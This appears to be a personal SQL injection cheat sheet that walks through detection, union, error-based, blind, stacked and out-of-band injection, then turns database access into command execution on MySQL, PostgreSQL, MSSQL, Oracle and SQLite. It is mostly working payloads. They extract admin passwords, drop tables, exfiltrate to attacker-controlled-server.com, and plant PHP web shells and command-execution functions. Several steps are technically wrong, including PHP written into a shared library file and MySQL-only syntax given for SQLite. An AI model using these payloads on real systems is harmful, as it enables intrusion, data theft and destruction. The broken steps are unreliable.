SqlI
Server-Side Attacks

WriteUps
@Mysql

How use Sqlmap

sqlmap -r req.txt --dbs --random-agent --risk 3 --level 5
How SQL Injection Works
At its core, SQLi exploits vulnerabilities in the input validation framework of an application.
When user inputs are not properly sanitized, an attacker can inject malicious SQL queries that the application will execute without question.
This can result in unauthorized access to sensitive information, data manipulation, and even complete control over the database.
1. Detection of SQL Injection Vulnerabilities
Reconnaissance => backend Use + DBMS
Detecting SQL Injection vulnerabilities involves testing for unexpected or unhandled inputs.
Techniques such as submitting single quotes ('
), double quotes ("
), or other SQL control characters can reveal how an application processes input.
Observing error messages or application responses can provide clues about the underlying SQL query structure, indicating potential injection points.
Entry Point Detection Examples:
Confirming with Logical Operations: Using statements like
1' OR '1'='1
can help determine if an application is vulnerable by altering the query logic.Timing Attacks: Introducing deliberate delays (
SLEEP
functions) in queries can help identify blind SQL Injection vulnerabilities by observing response times.
2. Exploiting SQL Injection
in band
Once a vulnerability is identified, exploiting it can take various forms depending on the database and the nature of the vulnerability:
Union Based SQL Injection:
Identifying the Number of Columns:
Both ORDER BY
and GROUP BY
can be exploited to identify the number of columns in the query's result set. This is crucial for constructing a successful UNION SELECT
attacks.
Scenario: You’ve identified a page that displays user details based on their ID from the URL parameter ?id=1
.
Vulnerable SQL Query:
SELECT name, age FROM users WHERE id = $_GET['id'];
Exploitation:
?id=1 UNION SELECT username, password FROM admin_users
In this example, the attacker appends a UNION SELECT
query to retrieve usernames and passwords from an admin_users
table, bypassing the intended query's limitations.
Error-Based SQL Injection:
It involves generating database errors to extract information from the error messages.
Scenario: An application displays detailed error messages when SQL queries fail.
Vulnerable SQL Query:
SELECT title, content FROM articles WHERE id = $_GET['id'];
Exploitation:
?id=1 AND (SELECT COUNT(*) FROM admin_users) = CAST('' AS INTEGER)
This payload causes a type conversion error, potentially revealing information about the database structure or data through error messages.
Exploiting blind SQL injection by triggering conditional errors
To see how this works, suppose that two requests are sent containing the following TrackingId
cookie values in turn:
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
These inputs use the CASE
keyword to test a condition and return a different expression depending on whether the expression is true:
Using this technique, you can retrieve data by testing one character at a time:
xyz' AND (SELECT
CASE
WHEN (Username = '
Administrator
' AND
SUBSTRING
(Password, 1, 1) > 'm')
THEN
1/0
ELSE
'a' END FROM Users)='a
Blind
No data is transferred from the web application to the attacker, so the attacker sends data to the database, true or false questions, and observes the response.
Scenario: The application does not display error messages or query results, but changes in response can be observed.
Boolean-Based Exploitation:
?id=1 AND (SELECT SUBSTRING(password, 1, 1) FROM admin_users WHERE username = 'admin') = 'a'
This method involves iteratively guessing the password character by character, and observing the application’s behavior (e.g., response time or content changes) to confirm the guess.
Time-Based Exploitation:
?id=1 AND IF((SELECT SUBSTRING(password, 1, 1) FROM admin_users WHERE username = 'admin') = 'a', sleep(5), 'false')
This payload uses a conditional time delay to confirm the password character, exploiting the database’s response time.
D. Stacked Queries SQL Injection
Key Detail: The database and interface must support multiple queries executed in a single database call.
Example:
?id=1; DROP TABLE users --
Stacked queries allow an attacker to execute additional queries after the initial, legitimate query. This is highly dependent on the database and the programming language’s database driver or ORM the application uses.
Out-of-band (OOB)
Key Detail: The database server must be able to make DNS or HTTP requests to external servers.
Example:
?id=1; SELECT LOAD_FILE('\\\\\\\\attacker-controlled-server.com\\\\data')
OOB techniques rely on the database server’s ability to communicate with external systems, allowing data exfiltration via DNS queries or HTTP requests.
F. Advanced SQL Injection Techniques
Authentication Bypass: Attackers might inject SQL to bypass login algorithms, often targeting the query logic.Mitigation: Employ strong input validation and parameterized queries for authentication mechanisms.
Inferential SQL Injection: Similar to Blind SQLi, this method involves making logical guesses about the data structure and content.Mitigation: Use WAFs and ensure applications do not reveal any hints in their responses.
Second Order SQL Injection: Occurs when user input is stored and later executed as a SQL query.Mitigation: Always sanitize user inputs, even when they are not immediately used in database queries.
SQl To RCE or Types of DB Get RCE
1.MySQL
LOAD_FILE() => Get file in System
INTO OUTFILE => Write php code in server or any lang
UDF (User Defined Functions)
Example
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'
go to the browser and use shell.php?cmd=ls
UDF
use into outfile
make shared library using C (.so, .dll) .so in Linux / .dll in Windows
Example in Linux
#include <stdio.h>
#include <stdlib.h>
void sys_exec(const char *cmd) {
system(cmd);
}
Load Library to system
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/usr/lib/mysql/plugin/udf.so';
create function to exec command
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'udf.so';
SELECT sys_exec('id')
2.PostgreSQL
COPY => Use to Write in Files
PG_READ_FILE() => Using to READ Files
COPY TO PROGRAM => Using to execute command in System
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO PROGRAM 'echo "<?php system($_GET["cmd"]); ?>" > /var/www/html/shell.php';
COPY (SELECT '') TO PROGRAM 'ls /tmp';
go to the browser and use shell.php?cmd=ls
PL/Python
enable Pl/Python
CERATE EXTENSION plpythonu;
2. Write Function to execute os.system
CREATE FUNCTION exec_system(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;
now can call function to EXEC to system command
SELECT exec_system('ls /tmp');
PL/Perl
CREATE EXTENSION plperl;
sqlCopy codeCREATE FUNCTION exec_perl_system(cmd text) RETURNS void AS $$
system(cmd);
$$ LANGUAGE plperl
#exec command
SELECT exec_perl_system('ls /tmp');
3. MSSQL
xp_cmdshell => EXECUTE command in system
EXEC xp_cmdshell 'dir';
4. Oracle
DBMS_SCHEULER => schedule command in the system
BEGIN
DBMS_SCHEDULER.create_job(
job_name => 'my_job',
job_type => 'EXECUTABLE',
job_action => '/bin/ls',
start_date => SYSTIMESTAMP,
enabled => TRUE
);
END;
5. SQLite
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'
Last updated